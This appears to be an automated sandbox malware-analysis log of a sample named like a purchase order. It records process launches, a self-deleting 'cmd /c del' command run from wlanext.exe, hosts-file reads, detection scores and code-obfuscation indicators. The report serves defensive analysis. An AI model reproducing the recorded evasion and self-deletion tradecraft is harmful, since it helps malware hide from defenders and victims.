Source: C:\Users\user\Desktop\PO45937008ADENGY.exe File created: C:\Users\user\IAHRsWbfqoM Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7024
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4676:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1284:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER15F6.tmp Jump to behavior
Source: PO45937008ADENGY.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: PO45937008ADENGY.exe Virustotal: Detection: 27%
Source: PO45937008ADENGY.exe ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe File read: C:\Users\user\Desktop\PO45937008ADENGY.exe:Zone.Identifier Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\PO45937008ADENGY.exe 'C:\Users\user\Desktop\PO45937008ADENGY.exe'
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 2152
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO45937008ADENGY.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1 Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1 Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO45937008ADENGY.exe' Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: PO45937008ADENGY.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: PO45937008ADENGY.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: onfiguration.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.670335958.0000000004C32000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: PO45937008ADENGY.exe, WerFault.exe, 0000000D.00000003.670367883.0000000000C45000.00000004.00000001.sdmp, wlanext.exe
Source: Binary string: crypt32.pdb_ source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: clr.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: .ni.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: PO45937008ADENGY.PDB source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: schannel.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.671537664.0000000000C57000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: WLDP.pdb/ source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: System.Windows.Forms.pdb< source: WER15F6.tmp.dmp.13.dr
Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: rasapi32.pdb| source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: System.Core.pdb( source: WER15F6.tmp.dmp.13.dr
Source: Binary string: CLBCatQ.pdb= source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000D.00000003.688645391.0000000005190000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbu source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbn source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: mscorsecimpl.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb! source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: shell32.pdbn source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000C.00000000.688286322.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbP source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdbUGP source: PO45937008ADENGY.exe, 00000009.00000003.664621972.0000000001160000.00000004.00000001.sdmp, wlanext.exe, 00000011.00000002.915414593.0000000003A1F000.00000040.00000001.sdmp
Source: Binary string: ncrypt.pdbk source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS source: WER15F6.tmp.dmp.13.dr
Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbps; source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: imagehlp.pdby source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb_ source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: propsys.pdbm source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: iVisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000D.00000003.670642715.0000000000C51000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER15F6.tmp.dmp.13.dr
Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: secur32.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: rasman.pdbv source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000D.00000003.688645391.0000000005190000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS source: WER15F6.tmp.dmp.13.dr
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: .pdb= source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WER15F6.tmp.dmp.13.dr
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb7 source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: rsaenh.pdbz source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: ml.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: Kernel.Appcore.pdb! source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: dhcpcsvc6.pdbQ source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wlanext.pdb source: PO45937008ADENGY.exe, 00000009.00000002.716498017.0000000002F80000.00000040.00000001.sdmp
Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: wUxTheme.pdbs source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: .pdb+ source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
Source: Binary string: cldapi.pdbC source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: shell32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: winhttp.pdb; source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: edputil.pdbI source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb\F1 source: WER15F6.tmp.dmp.13.dr
Source: Binary string: iLC:\Windows\Microsoft.VisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000D.00000003.688216819.00000000051AD000.00000004.00000040.sdmp
Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000D.00000003.688216819.00000000051AD000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb` source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: clrjit.pdbR source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: rtutils.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: System.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: Windows.Storage.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000D.00000003.670367883.0000000000C45000.00000004.00000001.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER15F6.tmp.dmp.13.dr
Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: rasman.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdbg source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb` source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: System.Xml.pdb source: WER15F6.tmp.dmp.13.dr
Source: Binary string: System.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: wscui.pdb source: explorer.exe, 0000000C.00000000.688286322.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000D.00000003.671537664.0000000000C57000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: powrprof.pdbT source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: System.Xml.pdb? source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbJ source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: C:\Users\user\Desktop\PO45937008ADENGY.PDB source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
Source: Binary string: wlanext.pdbGCTL source: PO45937008ADENGY.exe, 00000009.00000002.716498017.0000000002F80000.00000040.00000001.sdmp
Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: edputil.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp

Data Obfuscation:

barindex
Binary contains a suspicious time stamp
Source: PO45937008ADENGY.exe Static PE information: 0xEDF52E0E [Wed Jul 4 19:25:02 2096 UTC]
PE file contains an invalid checksum
Source: PO45937008ADENGY.exe Static PE information: real checksum: 0x16e14 should be: 0x29ee9
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 0_2_015BF138 pushad ; retf 0_2_015BF145
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041620A pushad ; iretd 9_2_00416230
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004152CC push ds; retf 9_2_004152DA
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041B3B5 push eax; ret 9_2_0041B408
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041B46C push eax; ret 9_2_0041B472
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041B402 push eax; ret 9_2_0041B408
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041B40B push eax; ret 9_2_0041B472
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004154BD push fs; iretd 9_2_004154DA
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_00415569 push edx; ret 9_2_0041568E
